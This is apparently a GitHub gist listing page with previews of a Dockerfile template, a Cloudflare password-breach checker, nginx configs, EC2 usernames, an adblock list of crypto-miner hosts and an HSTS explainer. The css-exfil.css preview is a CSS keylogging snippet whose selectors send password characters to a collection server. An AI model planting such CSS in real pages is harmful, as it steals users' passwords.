Hasan Tayyar BEŞİK hasantayyar
hasantayyar / Dockerfile
Created Apr 25, 2018 — forked from ju2wheels/Dockerfile
Docker Dockerfile reference template
View Dockerfile
# Last updated: 08/24/2916
#
# Total instructions available: 18
#
# https://docs.docker.com/engine/reference/builder/
#
# You can use a .dockerignore file in the same context directory as
# your Dockerfile to ignore files in the context before sending them
# to the Docker daemon for building to speed up building.
hasantayyar / pwnd.js
Created Feb 27, 2018 — forked from jgrahamc/pwnd.js
Cloudflare Worker that adds a "Cf-Password-Pwnd" header to a POST request indicating whether the 'password' field appears in Troy Hunt's database of pwned passwords.
View pwnd.js
addEventListener('fetch', event => {
  event.respondWith(fetchAndCheckPassword(event.request))
})

async function fetchAndCheckPassword(req) {
  if (req.method == "POST") {
    try {
      const post = await req.formData();
      const pwd = post.get('password')
      const enc = new TextEncoder("utf-8").encode(pwd)
View css-exfil.css
input[type="password"][value$=" "] { background-image: url("http://localhost:3000/+"); }
input[type="password"][value$="!"] { background-image: url("http://localhost:3000/%21"); }
input[type="password"][value$="\""] { background-image: url("http://localhost:3000/%22"); }
input[type="password"][value$="#"] { background-image: url("http://localhost:3000/%23"); }
input[type="password"][value$="$"] { background-image: url("http://localhost:3000/%24"); }
input[type="password"][value$="%"] { background-image: url("http://localhost:3000/%25"); }
input[type="password"][value$="&"] { background-image: url("http://localhost:3000/%26"); }
input[type="password"][value$="'"] { background-image: url("http://localhost:3000/%27"); }
input[type="password"][value$="("] { background-image: url("http://localhost:3000/%28"); }
input[type="password"][value$=")"] { background-image: url("http://localhost:3000/%29"); }
View nginx-cors.conf
map $http_origin $allow_origin {
    default "$http_origin";
}

map $request_method $cors_method {
    default "allowed";
    "OPTIONS" "preflight";
}

map $cors_method $cors_max_age {
hasantayyar / ec2_usernames.md
Last active Jan 2, 2018
aws ec2 default usernames
View ec2_usernames.md
| OS/Distro | Official AMI ssh Username | Legacy / Community / Other AMI ssh Usernames |
|---|---|---|
| Amazon Linux | ec2-user | |
| Ubuntu | ubuntu | root |
| Debian | admin | root |
| RHEL 6.4 and later | ec2-user | |
| RHEL 6.3 and earlier | root | |
| Fedora | fedora | ec2-user, root |
| CentOS | centos | root |
| SUSE | root | |
hasantayyar / filter.miners.txt
Created Dec 31, 2017
adblock filter for web miners
View filter.miners.txt
||coinhive.com/lib/*
||cryptoloot.pro/lib/*
||cdn.inwemo.com/*
||coin-have.com/c/*
||load.jsecoin.com/load/*
||minero.cc/lib/*
||ppoi.org/lib/*
||webmine.cz/*
hasantayyar / nginx.conf
Created Dec 5, 2017 — forked from plentz/nginx.conf
Best nginx configuration for improved security (and performance). Complete blog post here: http://tautt.com/best-nginx-configuration-for-security/
View nginx.conf
# to generate your dhparam.pem file, run in the terminal
# openssl dhparam -out /etc/nginx/ssl/dhparam.pem 2048
View CloudFlare_HSTS_Note.md

What is HTTP Strict Transport Security?

HTTP Strict Transport Security (HSTS, RFC 6797) is a header which allows a website to specify and enforce security policy in client web browsers. This policy enforcement protects secure websites from downgrade attacks, SSL stripping, and cookie hijacking. It allows a web server to declare a policy that browsers will only connect using secure HTTPS connections, and ensures end users do not “click through” critical security warnings.

HSTS is an important security mechanism for high security websites. HSTS headers are only respected when served over HTTPS connections, not HTTP.

HSTS generally has the following behavior in user web browsers:

  • Insecure HTTP links become secure HTTPS links
  • SSL certificate warnings or other errors show an error message and cannot be bypassed by the user
hasantayyar / .env
Created Oct 11, 2017 — forked from lukewduncan/.env
AWS Lambda function for Mailchimp list subscription
View .env
API_KEY='xxxxxxxxxxxxxxxxxxx-us1'
LIST_ID=12033101ax